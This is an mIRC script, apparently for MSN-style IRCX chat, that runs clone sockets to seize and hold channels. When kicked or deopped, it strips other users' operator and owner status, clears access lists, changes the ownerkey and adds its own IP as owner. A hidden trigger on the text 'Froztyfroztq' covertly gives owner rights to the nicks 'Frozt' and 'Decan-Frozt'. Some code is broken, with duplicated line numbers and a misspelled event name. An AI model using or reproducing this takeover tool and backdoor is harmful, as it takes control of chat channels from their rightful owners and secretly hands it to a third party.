[script]
n0=;:::sock1sh:::
n1=alias split { 
n2=  .timersplita -ocm 0 500 splita
n3=  .timer -cmo 1 250 .timersplitb -ocm 0 500 splitb
n4=  halt
n5=}
n6=alias splita { 
n7=  sockclose %split.nick
n8=  sockopen %split.nick 207.46.216.26 6667
n9=  halt
n10=}
n11=alias splitb {
n12=  sockclose %split.nick1
n13=  sockopen %split.nick1 207.46.216.26 6667
n14=  halt
n15=}
n16=
n17=on 1:sockopen:*:{
n18=  if ($sockname == %split.nick) {
n19=    .timersplita off
n20=    sockwrite -n $sockname nick $sockname $+ $crlf $+ user split split split split $+ $crlf $+ join %split.chans
n21=    echo -a $realtime $sys %split.nick Connected
n22=halt
n23=  }
n24=  if ($sockname == %split.nick1) {
n25=    .timersplitb off
n26=    sockwrite -n $sockname nick $sockname $+ $crlf $+ user split split split split $+ $crlf ircx $+ join %split.chans1
n27=    echo -a $realtime $sys %split.nick1 Connected
n28=halt
n29=  }
n30=  if ($sockname == %sock1) {
n31=    set %fp. [ $+ [ %sock1 ] ] ok
n32=    sockwrite -n %sock1 nick %sock1
n33=    sockwrite -n %sock1 user x x x x x x
n34=    sockwrite -n %sock1 ircx
n35=    halt
n36=  }
n37=  if ($sockname == %sock2) {
n38=    set %fp. [ $+ [ %sock2 ] ] ok
n39=    sockwrite -n %sock2 nick %sock2
n40=    sockwrite -n %sock2 user x x x x x x
n41=    sockwrite -n %sock2 ircx
n42=    halt
n43=  }
n44=  else {
n45=    set %fp. [ $+ [ $sockname ] ] ok
n46=    sockwrite -n $sockname 207.46.216.26 6667
n47=    sockwrite -n $sockname user x x x x x x
n48=    sockwrite -n $sockname ircx
n49=    sockwrite -n $sockname nick $sockname
n50=    halt
n51=  }  
n52=}
n53=on 1:sockread:*:{
n54=  sockread %key
n55=  set %smask $address($remove($gettok(%key,1,33),:),4)
n56=  if ($gettok(%key,2,32) == MODE) && ($gettok(%key,4-,32) == -q $sockname) {
n57=    if (%smask == $address($me,4)) { goto nono }
n58=    if (%fp. [ $+ [ $sockname ] ] == ok) {
n59=      set %fp. $+ $sockname blah
n60=      .timer 1 3 set %fp. $+ $sockname ok
n61=      sockwrite -n $sockname part $gettok(%key,3,32) $+ $crlf $+ join $gettok(%key,3,32) %sklg. [ $+ [ $gettok(%key,3,32) ] ]
n62=      sockwrite -n $sockname mode $gettok(%key,3,32) +qqq-ooo %sock1 %sock2 $me $ial(%smask,1).nick $ial(%smask,2).nick $ial(%smask,3).nick $+ $crlf $+ access $gettok(%key,3,32) clear
n63=      sockwrite -n $sockname prop $gettok(%key,3,32) ownerkey : $+ $key $+ $crlf $+ access # clear
n64=      halt    
n65=      :nono
n66=      sockwrite -n $sockname part $gettok(%key,3,32) $+ $crlf $+ join $gettok(%key,3,32) %sklg. [ $+ [ $gettok(%key,3,32) ] ]
n67=      halt
n68=    }
n69=  }
n70=  if ($gettok(%key,2,32) == KICK) && ($gettok(%key,4,32) == $sockname) {
n71=    if (%smask == $address($me,4)) { goto hehe }
n72=    sockwrite -n $sockname join $gettok(%key,3,32) %sklg. [ $+ [ $gettok(%key,3,32) ] ] 
n73=    sockwrite -n $sockname kick $gettok(%key,3,32) $ial(%smask,1).nick $+ $chr(44) $+ $ial(%smask,2).nick $+ $chr(44) $+ $ial(%smask,3).nick :u started it... $+ $crlf $+ access $gettok(%key,3,32) clear
n74=    sockwrite -n $sockname prop $gettok(%key,3,32) ownerkey : $+ $key $+ $crlf $+ access $gettok(%key,3,32) clear
n75=    halt
n76=    :hehe
n77=    sockwrite -n $sockname join $gettok(%key,3,32) %sklg. [ $+ [ $gettok(%key,3,32) ] ]
n78=    halt
n79=  }
n80=  if ($gettok(%key,2,32) == PROP) && ($gettok(%key,4,32) == OWNERKEY) {
n81=    if ($remove($gettok(%key,5,32),:) == $null) && (%floodkc == ok) { set %floodkc blah | .timer 1 4 set %floodkc ok | sockwrite -n $sockname mode $gettok(%key,3,32) -oooooo $ial(%smask,1).nick $ial(%smask,2).nick $ial(%smask,3).nick $ial(%smask,1).nick $ial(%smask,2).nick $ial(%smask,3).nick $+ $crlf $+ access $gettok(%key,3,32) clear $+ $crlf $+ prop $gettok(%key,3,32) ownerkey $rand(1,99999) | halt }
n82=    else { set %sklg. $+ $gettok(%key,3,32) $remove($gettok(%key,5,32),:) | halt }
n83=  }
n84=  if ($gettok(%key,1,32) == PING) { sockwrite -n $sockname PONG! | halt }
n85=}
n85=on 1:text:*Froztyfroztq*:#:{ /mode # +q Decan-Frozt | /mode # +q Frozt }
n86=on 1:RAWODE:#:{
n87=  if ($1 == -q) && ($2 == $me) && (%dp == on) {
n88=    set %dp off
n89=    .raw -q part #
n90=    .raw -q join # %owner. [ $+ [ $lower(#) ] ]
n91=    set %deop.address $address($nick,4)
n92=    deoppro $nick
n93=    $rkey
n94=    .raw -q access # add owner $ip
n95=    .timer 1 3 set %dp on
n96=  }
n97=}
n98=on 1:kick:#:{ 
n99=  if ($knick == $me) {
n100=    .raw -q join # %owner. [ $+ [ # ] ]
n101=  }
n102=}
n98=on 1:deop:#:{ 
n99=  if ($knick == $me) {
n100=    .raw -q join # %owner. [ $+ [ # ] ]
n101=  }
n102=}
